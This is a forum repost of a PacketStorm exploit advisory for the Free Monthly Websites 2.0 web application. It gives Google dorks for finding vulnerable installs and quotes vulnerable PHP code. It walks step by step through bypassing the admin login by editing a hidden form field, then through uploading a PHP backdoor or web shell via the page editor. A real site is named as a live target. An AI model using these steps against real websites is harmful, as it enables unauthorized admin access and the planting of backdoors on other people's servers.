Jump to content
Praetorian503

Free Monthly Websites 2.0 Admin Bypass / Shell Upload

Recommended Posts

Free Monthly Websites version 2.0 suffers from administrative login bypass and remote shell upload vulnerabilities.

========================================================================================== 
Free Monthly Websites 2.0 Multiple Vulnerabilities
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Free Monthly Websites 2.0 Multiple Vulnerabilities
: # Date : 04 February 2013
: # Author : X-Cisadane
: # Vendor : http://www.freemonthlywebsites2.com/
: # Download : http://www.freemonthlywebsites2.com/downloads/fmw_oto/websites/Free_Monthly_Websites_50_Custom_Websites_MPW7199.zip
: # Version : 2.0
: # Category : Web Applications
: # Vulnerability : Admin Login Bypass and Shell Upload Vulnerability
: # Tested On : Google Chrome 24.0.1312.52 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas
:----------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
inurl:/index_ebay.php
"Powered by: Resell Rights Fortune"
"Generating Traffic to Your Site with Keyword Based Articles"
Powered By: Free Monthly Websites 2.0

Proof of Concept
================
[ 1 ] Admin Login Bypass

Vulnerable page http://target.com/[path]/admin/index.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/login.php
Line
40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">
41 <input type="hidden" name="do_type" value="admin_settings_read">

Vulnerable page http://target.com/[path]/admin/file_io.php
Line
14 if($_REQUEST[do_type]=="admin_settings_read")
15 {
16 $filename="settings/admin_settings.txt";
17
18 if(!$handle = fopen($filename, 'r'))
19 {
20 echo "Cannot open file ($filename)";
21 exit;
22 }
23 $contents = fread($handle, filesize($filename));
24 fclose($handle);
25 $argument_arr=explode("#_1_#",$contents);
26
27 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])
28 {
29 $_SESSION[logged_in]=true;
30 header("location:welcome.php");

Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database!
So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txt
If you do a direct access to the file admin_settings.txt, The results is

403 Permission Denied
You do not have permission for this request /admin/settings/admin_settings.txt
Pic : http://i48.tinypic.com/2gvlwt4.png


So... How to Bypass Admin Login Page?
1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php
Live Target : http://www.massmoneywebsites.com/admin/

2nd. Inspect Element on the login Form.
Pic : http://i47.tinypic.com/2r5ddp1.png

3rd. Change from
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="hidden" name="do_type" value="admin_settings_read">

CHANGE TO
<form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form>
<input type="text" name="do_type" value="admin_settings_write">
Then press ENTER (please see pic).
Pic : http://i49.tinypic.com/351z3ib.png

4th. You will see A Login Failed Page : >> You need to login in to access that page <<
Pic : http://i50.tinypic.com/33ws8jb.png
Never Mind About that, just click 'Login Button' and VOILA you get and Admin Access!
pic : http://i45.tinypic.com/jzwpea.png
----------------------------------------
[ 2 ] Upload PHP Backdoor or PHP Shell

This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0

So... How to Upload Backdoor (PHP Shell)?

1st. Go to Add/Remove Navigation Page.
http://target.com/[path]/admin/add_main_pages.php
Live Target : http://www.massmoneywebsites.com/admin/add_main_pages.php

2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php
And click Add New Navigation Page.
Pic : http://i45.tinypic.com/vigzsp.png

3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links.
Pic : http://i46.tinypic.com/1040oxg.png
Change FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.
Pic : http://i49.tinypic.com/24ec1l0.jpg

4th. Go to Edit Navigation Page.
http://www.massmoneywebsites.com/admin/edit_main_pages.php
Please Select a Page To Edit: dwi.php.html <--- Select that page.

5th. Inspect element on dwi.php.html
Pic : http://i50.tinypic.com/29pq1ix.png
Change FROM <option value="dwi.php.html" selected="">dwi.php.html</option>
To <option value="dwi.php" selected="">dwi.php</option>
Pic : http://i47.tinypic.com/wtb0j6.png

6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.php
URL For This Page: main_pages/dwi.php
Use the 'URL For This Page' field above: [Tick]
Display This Page in Left Vertical Site Navigation: [Tick]
Display This Page in Top Horizontal Site Navigation Buttons: [Tick]
Pic : http://i46.tinypic.com/1zebnle.png

7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page:
Click SOURCE button
Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below.
And Press Enter Twice at the Last Line.
*Please see 2 Pictures below If you dunno Understand
Pic 1 : http://i49.tinypic.com/1zlzxq0.png
Pic 2 : http://i48.tinypic.com/291kc9h.png

If you wanna do this, please Remove Your Backdoor Password.
Click Save Edited Navigation Page.

8th. After this message >> Data saved successfully << Appeared, Visit the Home Page and you will see the Backdoor Page
Pic : http://i49.tinypic.com/4rt1g4.png

//I'm sorry My English was poor

Source: PacketStorm

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...